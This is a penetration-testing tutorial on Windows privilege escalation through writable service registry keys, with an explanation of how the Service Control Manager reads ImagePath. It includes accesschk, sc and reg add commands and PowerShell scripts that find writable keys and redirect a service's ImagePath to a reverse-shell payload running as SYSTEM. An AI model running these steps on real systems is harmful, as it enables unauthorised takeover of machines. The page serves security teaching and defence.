# Weak Registry Permissions

### Overview

**Weak Registry Permissions** is a Windows local privilege escalation technique where a low-privileged user has write access to registry keys that control how a high-privileged service runs.

Windows services store critical configuration in the registry, including:

* Service executable path
* Startup parameters
* Service DLLs (for `svchost`)
* Failure actions

If these registry keys are **writable**, an attacker can point them at a payload that runs **as the service account, usually SYSTEM**, the next time the service starts.

### Why this Works

Windows Service Control Manager (SCM):

1. Reads service configuration from:

   ```
   HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>
   ```
2. Uses values such as:
   * `ImagePath`
   * `Parameters\ServiceDll`
3. Launches the service using the configured account (often **LocalSystem**)

If a low-privileged user can modify these values, SCM will **blindly trust the registry configuration**: the service's own DACL only governs changes made through SCM (`sc config`), not direct writes to the key. The commonly abused registry values are listed below.

| Registry Value   | Purpose                        |
| ---------------- | ------------------------------ |
| `ImagePath`      | Path to service executable     |
| `ServiceDll`     | DLL loaded by svchost services |
| `ObjectName`     | Account the service runs as    |
| `FailureCommand` | Command executed on failure    |
| `Start`          | Auto / Manual start            |
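
Putting the table above to work, here is an added PowerShell example (not code from the original page) that walks every service key, keeps the user-mode services, and reports the ones whose DACL grants the current token a right that lets it rewrite these values. It assumes Windows PowerShell 5.1 or later, run as the low-privileged user, and that the service keys are readable by that user, which is the default.

```powershell
# Added example, not from the original page. Assumes Windows PowerShell 5.1+ run as
# the low-privileged user and read access to the Services key (the default).

function Find-WritableServiceKey {
    # SIDs carried by the current token: the user plus all group memberships, so an
    # ACE granted to BUILTIN\Users, Authenticated Users or Everyone is recognised.
    $id     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })

    # Access-mask bits that let the token change service configuration.
    # KEY_SET_VALUE alone is enough to rewrite ImagePath; WRITE_DAC / WRITE_OWNER let
    # the token grant itself KEY_SET_VALUE; the generic bits show up on ACEs written
    # as GA / GW and map to full or write access on the key.
    $KEY_SET_VALUE = 0x00000002
    $WRITE_DAC     = 0x00040000
    $WRITE_OWNER   = 0x00080000
    $GENERIC_ALL   = 0x10000000
    $GENERIC_WRITE = 0x40000000
    $dangerous = $KEY_SET_VALUE -bor $WRITE_DAC -bor $WRITE_OWNER -bor $GENERIC_ALL -bor $GENERIC_WRITE

    $startType = @{ 0 = 'Boot'; 1 = 'System'; 2 = 'Auto'; 3 = 'Manual'; 4 = 'Disabled' }

    $services = Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue
    foreach ($key in $services) {
        # Keep user-mode services only: Type 0x10 (own process) or 0x20 (shared
        # svchost process). Driver keys live under Services too but are not started
        # by SCM as a process, so ImagePath there is a different story.
        $props = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $props -or -not ($props.Type -band 0x30)) { continue }

        # Reading a DACL needs READ_CONTROL; keys that refuse it are skipped.
        try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { continue }

        foreach ($ace in $acl.Access) {
            # Allow ACEs only; a matching Deny ACE elsewhere in the DACL would still
            # win, so treat hits as candidates to confirm with accesschk.
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if (-not ([int]$ace.RegistryRights -band $dangerous)) { continue }

            # Resolve the ACE principal to a SID so it can be matched against the token.
            try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
            catch { continue }
            if ($sid -notin $mySids) { continue }

            [pscustomobject]@{
                Service   = $key.PSChildName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                RunsAs    = $props.ObjectName          # LocalSystem is the high-value case
                Start     = $startType[[int]$props.Start]
                ImagePath = $props.ImagePath
            }
        }
    }
}

Find-WritableServiceKey | Format-Table -AutoSize
```

A hit with `RunsAs` of `LocalSystem` and `Start` of `Auto` is the ideal target: the payload runs as SYSTEM even if you cannot start the service yourself, because SCM re-reads the key at the next boot. Confirm any candidate with `accesschk`, since this script does not subtract Deny ACEs.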

### Prerequisites

1. Local low-privileged access
2. Service runs as a high-privileged account (typically `LocalSystem`)
3. Writable registry key or value under `HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>`
4. A way to make SCM re-read the configuration: `SERVICE_START`/`SERVICE_STOP` on the service, or, for an auto-start service, a reboot (which needs `SeShutdownPrivilege`) or simply waiting for one

### Steps

1. Confirm how the service runs. `SERVICE_START_NAME` shows the account (`LocalSystem` is the target case) and `START_TYPE` tells you whether a reboot would also trigger it:

   ```cmd
   sc qc <serviceName>
   ```
2. Check whether your user or one of your groups has write access on the service key. `-w` lists only entries with write access; `KEY_ALL_ACCESS` or `KEY_SET_VALUE` is enough, and `WRITE_DAC` lets you grant yourself either:

   ```cmd
   REM Look for KEY_ALL_ACCESS, KEY_SET_VALUE or WRITE_DAC next to your user/group
   accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\<serviceName>
   ```
3. Point `ImagePath` at your payload (keep the `REG_EXPAND_SZ` type the original value uses):

   ```cmd
   reg add HKLM\SYSTEM\CurrentControlSet\Services\<serviceName> /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
   ```
4. Restart or start the service. `sc start` will normally end with error 1053 because the payload never registers with SCM as a service; by then the payload has already been launched, but SCM terminates the process when it gives up, so a payload that blocks (a plain reverse shell) should spawn a separate process first:

   ```cmd
   sc stop <serviceName>
   sc start <serviceName>
   ```
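
The four steps above as one PowerShell script, added here as an example rather than taken from the page. The service name `vulnsvc` is an assumption and the payload path is the one from the `reg add` command; the original `ImagePath` is saved first so the change can be reverted once the session is in.

```powershell
# Added example, not from the original page. Service name and payload path are
# assumptions; the payload path matches the reg add command above.
$svc     = 'vulnsvc'
$payload = 'C:\PrivEsc\reverse.exe'
$keyPath = "HKLM:\SYSTEM\CurrentControlSet\Services\$svc"

# 1. Record the current configuration: the account the payload will run as, the
#    start type (2 = Auto, 3 = Manual), and the ImagePath to restore afterwards.
$before = Get-ItemProperty -Path $keyPath
"RunsAs={0} Start={1} ImagePath={2}" -f $before.ObjectName, $before.Start, $before.ImagePath
if ($before.ObjectName -ne 'LocalSystem') { Write-Warning "service does not run as LocalSystem" }
$backup = $before.ImagePath

# 2. Point ImagePath at the payload. The original is REG_EXPAND_SZ; keep that type
#    so SCM still expands any %SystemRoot%-style variables in the restored value.
Set-ItemProperty -Path $keyPath -Name ImagePath -Value $payload -Type ExpandString

# 3. Confirm SCM now sees the new path. `sc` alone is the Set-Content alias in
#    PowerShell, so call sc.exe explicitly.
sc.exe qc $svc | Select-String 'BINARY_PATH_NAME'

# 4. Make SCM start the service. Stop/start are governed by the service DACL
#    (SERVICE_STOP / SERVICE_START), a separate check from the key DACL.
try   { Stop-Service -Name $svc -Force -ErrorAction Stop }
catch { "stop: $($_.Exception.Message)" }
try   { Start-Service -Name $svc -ErrorAction Stop }
catch {
    # "did not respond ... in a timely fashion" (1053) means the payload was launched
    # but never registered with SCM, which is expected for a non-service binary.
    # "Access is denied" means SERVICE_START is missing; with Start=2 the new
    # ImagePath still runs at the next boot.
    "start: $($_.Exception.Message)"
    if ($before.Start -eq 2) { "Start=2 (Auto): payload will run at next boot" }
}

# 5. Cleanup once the session is in. Skip this if you are relying on the next
#    boot to launch the payload.
Set-ItemProperty -Path $keyPath -Name ImagePath -Value $backup -Type ExpandString
sc.exe qc $svc | Select-String 'BINARY_PATH_NAME'
```

`Set-ItemProperty` writes to the key directly, so only the registry ACL is checked; `Stop-Service` and `Start-Service` go through SCM and are checked against the service's own security descriptor, which is why step 4 can fail even when step 2 succeeded.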

{% hint style="info" %}
What is the difference between modifying the service's registry key directly and modifying the service via `sc config <svc_name>`?

#### Q) How does `sc config` work internally

1. `sc.exe` talks to **Service Control Manager**
2. SCM checks the **service security descriptor**
3. Requires `SERVICE_CHANGE_CONFIG`
4. SCM updates the registry **on your behalf**

`User → SCM → Registry`

You need **service-level permissions** on the service object, such as:

* `SERVICE_CHANGE_CONFIG`
* `WRITE_DAC` (lets you rewrite the service DACL and grant yourself `SERVICE_CHANGE_CONFIG`)
* `SERVICE_ALL_ACCESS` (full control)

#### **Q) Direct Registry Modification (Bypass SCM)**

1. You write directly to the registry path.
2. SCM is **not involved**
3. SCM reads the value **later**, when starting the service

You need **registry-level write access** on the service key, such as:

* `Set Value` (`KEY_SET_VALUE`)
* `Write DAC` (`WRITE_DAC`, which lets you grant yourself `Set Value`)
* `Full Control` (`KEY_ALL_ACCESS`)

Both paths end in the same registry values, so the service DACL and the key DACL are two independent gates: a service hardened against `sc config` is still exploitable if its key is writable, and vice versa.
{% endhint %}
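
To see which of the two gates is open for a given service, the check below reads the service's own security descriptor, the one SCM consults for `sc config`, `sc start` and `sc stop`, and decodes it against the current token. This is an added example, not code from the page; the `vulnsvc` name is hypothetical and the access-mask constants are the `SERVICE_*` values from `winsvc.h`. It complements the registry ACL check from step 2 rather than repeating it.

```powershell
# Added example, not from the original page. $ServiceName 'vulnsvc' is hypothetical.
# Access-mask constants are the SERVICE_* values from winsvc.h plus standard rights.

function Get-ServiceTokenRights {
    param([Parameter(Mandatory)][string]$ServiceName)

    $SERVICE_CHANGE_CONFIG = 0x00000002
    $SERVICE_START         = 0x00000010
    $SERVICE_STOP          = 0x00000020
    $WRITE_DAC             = 0x00040000
    $WRITE_OWNER           = 0x00080000
    $SERVICE_ALL_ACCESS    = 0x000F01FF
    $GENERIC_EXECUTE       = 0x20000000   # service generic mapping: START | STOP | PAUSE_CONTINUE | USER_DEFINED_CONTROL
    $GENERIC_WRITE         = 0x40000000   # service generic mapping: CHANGE_CONFIG
    $GENERIC_ALL           = 0x10000000   # service generic mapping: SERVICE_ALL_ACCESS

    $id     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })

    # `sc sdshow` prints the service descriptor as SDDL (needs READ_CONTROL, which
    # standard users normally have). RawSecurityDescriptor parses it and resolves
    # the two-letter SID aliases (BU, AU, IU, WD, ...) to real SIDs.
    # `sc` alone is an alias for Set-Content in PowerShell, hence sc.exe.
    $line = sc.exe sdshow $ServiceName | Where-Object { $_ -match '^\s*D:' } | Select-Object -First 1
    if (-not $line) { throw "no SDDL returned for '$ServiceName' (access denied or no such service)" }
    $sddl = ([string]$line).Trim()
    $sd   = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $sddl

    # Union of every Allow ACE that names a SID in the token. Deny ACEs are not
    # subtracted here, so the result is an upper bound on what the token holds.
    $mask = 0
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceType -ne 'AccessAllowed') { continue }
        if ($ace.SecurityIdentifier.Value -notin $mySids) { continue }
        $mask = $mask -bor $ace.AccessMask
    }
    # Expand generic bits the way the service object's generic mapping does.
    if ($mask -band $GENERIC_ALL)     { $mask = $mask -bor $SERVICE_ALL_ACCESS }
    if ($mask -band $GENERIC_WRITE)   { $mask = $mask -bor $SERVICE_CHANGE_CONFIG }
    if ($mask -band $GENERIC_EXECUTE) { $mask = $mask -bor $SERVICE_START -bor $SERVICE_STOP }

    [pscustomobject]@{
        Service      = $ServiceName
        ChangeConfig = [bool]($mask -band $SERVICE_CHANGE_CONFIG)         # gate for `sc config`
        WriteDac     = [bool]($mask -band ($WRITE_DAC -bor $WRITE_OWNER))  # can rewrite the service DACL
        CanStart     = [bool]($mask -band $SERVICE_START)                 # gate for `sc start`
        CanStop      = [bool]($mask -band $SERVICE_STOP)                  # gate for `sc stop`
        Mask         = ('0x{0:X8}' -f $mask)
    }
}

Get-ServiceTokenRights -ServiceName 'vulnsvc'
```

Read the two results together: `ChangeConfig = False` with a writable key is exactly the weak-registry-permissions case (direct write works, `sc config` does not), and `CanStart`/`CanStop` decide whether step 4 can be done from the current token or has to wait for a reboot.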


